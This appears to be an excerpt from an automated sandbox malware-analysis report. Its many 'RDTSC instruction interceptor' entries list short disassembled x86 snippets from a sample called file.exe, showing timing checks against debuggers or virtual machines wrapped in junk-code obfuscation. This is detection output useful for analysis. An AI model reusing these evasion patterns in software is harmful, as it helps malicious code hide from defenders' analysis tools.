              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC506B second address: BC5071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC7FD1 second address: BC7FD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC7FD5 second address: BC7FDB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC7FDB second address: BC7FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0447 second address: BD045A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48BEh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0593 second address: BD05AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65E53D951Fh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD05AB second address: BD05BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48BCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0B4C second address: BD0B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F65E53D951Dh 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0CBD second address: BD0CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0CD1 second address: BD0CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65E53D9520h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0CEB second address: BD0CEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0CEF second address: BD0CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0CF3 second address: BD0CFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD0E4D second address: BD0E6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9523h 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F65E53D9516h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A44 second address: BD1A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A48 second address: BD1A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A4C second address: BD1A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A52 second address: BD1A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D9524h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD1A6A second address: BD1A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD22DB second address: BD22E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD22E1 second address: BD22E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD26C5 second address: BD26C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD26C9 second address: BD26E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD27A1 second address: BD27C1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b nop 0x0000000c add dword ptr [ebp+122D31D6h], esi 0x00000012 xchg eax, ebx 0x00000013 pushad 0x00000014 jl 00007F65E53D9518h 0x0000001a push edi 0x0000001b pop edi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD27C1 second address: BD27C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2C2E second address: BD2CAF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65E53D9518h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F65E53D9518h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jmp 00007F65E53D9529h 0x0000002c mov di, DAD3h 0x00000030 push 00000000h 0x00000032 jns 00007F65E53D9517h 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F65E53D9518h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 00000014h 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov edi, 2CEB56F4h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD2CAF second address: BD2CB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4EEB second address: BD4EEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD5B6B second address: BD5BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jmp 00007F65E53D48C6h 0x0000000a pop esi 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+122D1D41h] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 xor edi, 0F0F5A68h 0x0000001e pop edi 0x0000001f pushad 0x00000020 mov ax, si 0x00000023 call 00007F65E53D48BDh 0x00000028 mov eax, dword ptr [ebp+122D2F36h] 0x0000002e pop ebx 0x0000002f popad 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ecx 0x00000035 call 00007F65E53D48B8h 0x0000003a pop ecx 0x0000003b mov dword ptr [esp+04h], ecx 0x0000003f add dword ptr [esp+04h], 00000018h 0x00000047 inc ecx 0x00000048 push ecx 0x00000049 ret 0x0000004a pop ecx 0x0000004b ret 0x0000004c xchg eax, ebx 0x0000004d jmp 00007F65E53D48BCh 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push edi 0x00000057 pop edi 0x00000058 jmp 00007F65E53D48BFh 0x0000005d popad 0x0000005e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD4EEF second address: BD4EF8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E57 second address: BD6E5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E5B second address: BD6E61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E61 second address: BD6E67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E67 second address: BD6E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD6E6B second address: BD6E7D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007F65E53D48B6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BD98FA second address: BD990D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F65E53D9516h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDBDD8 second address: BDBDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F65E53D48BBh 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD27F second address: BDD284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD325 second address: BDD32B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD4C5 second address: BDD556 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+124759BDh], esi 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007F65E53D9518h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 00000014h 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 mov di, si 0x00000034 pushad 0x00000035 sbb edx, 53298A82h 0x0000003b popad 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov edi, 032D3FBFh 0x00000048 mov eax, dword ptr [ebp+122D0F3Dh] 0x0000004e sbb ebx, 559973DDh 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push ecx 0x00000059 call 00007F65E53D9518h 0x0000005e pop ecx 0x0000005f mov dword ptr [esp+04h], ecx 0x00000063 add dword ptr [esp+04h], 0000001Ch 0x0000006b inc ecx 0x0000006c push ecx 0x0000006d ret 0x0000006e pop ecx 0x0000006f ret 0x00000070 mov edi, dword ptr [ebp+124759BDh] 0x00000076 push eax 0x00000077 push eax 0x00000078 push edx 0x00000079 jne 00007F65E53D951Ch 0x0000007f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF127 second address: BDF196 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F65E53D48B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F65E53D48B8h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov bh, 0Eh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push ecx 0x0000002e call 00007F65E53D48B8h 0x00000033 pop ecx 0x00000034 mov dword ptr [esp+04h], ecx 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc ecx 0x00000041 push ecx 0x00000042 ret 0x00000043 pop ecx 0x00000044 ret 0x00000045 mov ebx, esi 0x00000047 mov dword ptr [ebp+122D2C5Ch], ebx 0x0000004d push 00000000h 0x0000004f or dword ptr [ebp+122D32B0h], esi 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF196 second address: BDF19C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF19C second address: BDF1A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDF1A2 second address: BDF1A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE0195 second address: BE0199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE127B second address: BE12A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D9523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F65E53D951Eh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE12A3 second address: BE12A8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE3376 second address: BE3383 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE3383 second address: BE341E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1D41h], edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F65E53D48B8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b call 00007F65E53D48BBh 0x00000030 pushad 0x00000031 jnl 00007F65E53D48B6h 0x00000037 mov eax, dword ptr [ebp+122D2D32h] 0x0000003d popad 0x0000003e pop edi 0x0000003f mov ebx, edx 0x00000041 push 00000000h 0x00000043 push 00000000h 0x00000045 push edx 0x00000046 call 00007F65E53D48B8h 0x0000004b pop edx 0x0000004c mov dword ptr [esp+04h], edx 0x00000050 add dword ptr [esp+04h], 00000015h 0x00000058 inc edx 0x00000059 push edx 0x0000005a ret 0x0000005b pop edx 0x0000005c ret 0x0000005d jmp 00007F65E53D48C2h 0x00000062 mov dword ptr [ebp+1247AC4Fh], eax 0x00000068 xchg eax, esi 0x00000069 jp 00007F65E53D48C4h 0x0000006f push eax 0x00000070 pushad 0x00000071 pushad 0x00000072 push eax 0x00000073 push edx 0x00000074 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE341E second address: BE3429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE3429 second address: BE342D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5B1D second address: BE5B71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F65E53D9518h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b xchg eax, esi 0x0000002c push ecx 0x0000002d jno 00007F65E53D9518h 0x00000033 pop ecx 0x00000034 push eax 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F65E53D9520h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5B71 second address: BE5B75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6B51 second address: BE6B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F65E53D9518h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8B5E second address: BE8B63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE5C71 second address: BE5C7B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65E53D951Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9A8F second address: BE9A99 instructions: 0x00000000 rdtsc 0x00000002 js 00007F65E53D48B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE8D16 second address: BE8D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jne 00007F65E53D9516h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9A99 second address: BE9ABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F65E53D48C1h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65E53D48BAh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF0F17 second address: BF0F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF0F1D second address: BF0F3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF498C second address: BF49AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F65E53D9528h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49AD second address: BF49B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49B9 second address: BF49D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F65E53D9516h 0x0000000a jmp 00007F65E53D951Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF49D2 second address: BF49E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48BAh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4B1C second address: BF4B22 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4C86 second address: BF4C8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0013A second address: C0013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0013E second address: C0015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F65E53D48B6h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AE3A second address: B9AE3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AE3F second address: B9AE71 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F65E53D48C9h 0x00000008 pushad 0x00000009 jmp 00007F65E53D48C2h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AE71 second address: B9AE9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D9526h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e jmp 00007F65E53D951Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9AE9D second address: B9AEA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF450 second address: BFF45A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65E53D9528h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF5BA second address: BFF5C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF5C0 second address: BFF5C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFF9F2 second address: BFFA12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65E53D48C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFA12 second address: BFFA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFB8F second address: BFFB99 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFB99 second address: BFFBA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFCE0 second address: BFFCFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F65E53D48C2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFCFA second address: BFFCFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFE5B second address: BFFE5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFE5F second address: BFFE6C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F65E53D9516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFFE6C second address: BFFE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65E53D48C1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0449B second address: C044B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65E53D9521h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
